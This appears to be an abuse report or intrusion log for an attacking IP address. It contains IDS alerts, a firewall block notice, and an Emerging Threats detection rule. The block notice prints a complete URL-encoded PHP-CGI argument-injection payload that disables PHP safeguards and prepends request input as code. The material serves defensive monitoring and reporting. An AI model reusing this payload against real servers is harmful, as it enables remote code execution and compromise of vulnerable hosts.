[1:2016977:5] ET WEB_SERVER allow_url_include PHP config option in uri [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 185.225.75.21:57190 -> x.x.x.x:443
[1:2016978:5] ET WEB_SERVER safe_mode PHP config option in uri [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 185.225.75.21:57190 -> x.x.x.x:443
[1:2016979:6] ET WEB_SERVER suhosin.simulation PHP config option in uri [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 185.225.75.21:57190 -> x.x.x.x:443
[1:2016980:7] ET WEB_SERVER disable_functions PHP config option in uri [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 185.225.75.21:57190 -> x.x.x.x:443
[1:2016981:6] ET WEB_SERVER open_basedir PHP config option in uri [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 185.225.75.21:57190 -> x.x.x.x:443
185.225.75.21 -h (38337-NIU Telecommunications Inc United States -) - - [08/Aug/2023:06:05:01 +0200] "POST //%63%67%69%2d%62%69%6e/%70%68%70?%2d%64+%61%6c%6c%6f%77%5f%75%72%6c%5f%69%6e%63%6c%75%64%65%
...
[SID: 31922] Web Attack: Malicious Payload Upload 12 attack blocked. Traffic has been blocked for this application: SYSTEM
URL: http://-h//%63%67%69%2d%62%69%6e/%70%68%70?%2d%64+%61%6c%6c%6f%77%5f%75%72%6c%5f%69%6e%63%6c%75%64%65%3d%6f%6e+%2d%64+%73%61%66%65%5f%6d%6f%64%65%3d%6f%66%66+%2d%64+%73%75%68%6f%73%69%6e%2e%73%69%6d%75%6c%61%74%69%6f%6e%3d%6f%6e+%2d%64+%64%69%73%61%62%6c%65%5f%66%75%6e%63%74%69%6f%6e%73%3d%22%22+%2d%64+%6f%70%65%6e%5f%62%61%73%65%64%69%72%3d%6e%6f%6e%65+%2d%64+%61%75%74%6f%5f%70%72%65%70%65%6e%64%5f%66%69%6c%65%3d%70%68%70%3a%2f%2f%69%6e%70%75%74+%2d%64+%63%67%69%2e%66%6f%72%63%65%5f%72%65%64%69%72%65%63%74%3d%30+%2d%64+%63%67%69%2e%72%65%64%69%72%65%63%74%5f%73%74%61%74%75%73%5f%65%6e%76%3d%30+%2d%64+%61%75%74%6f%5f%70%72%65%70%65%6e%64%5f%66%69%6c%65%3d%70%68%70%3a%2f%2f%69%6e%70%75%74+%2d%6e
Hacking, Web App Attack
Anonymous
The following intrusion was observed: PHP.CGI.Argument.Injection.
alert http $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"ET WEB_SERVER disable_functions PHP config option in uri"; flow:established,to_server; http.uri; content:"disable_functions"; fast_pattern; pcre:"/\bdisable_functions[\s\+]*?=/"; reference:url,seclists.org/fulldisclosure/2013/Jun/21; classtype:trojan-activity; sid:2016980; rev:7; metadata:created_at 2013_06_06, updated_at 2020_09_18;)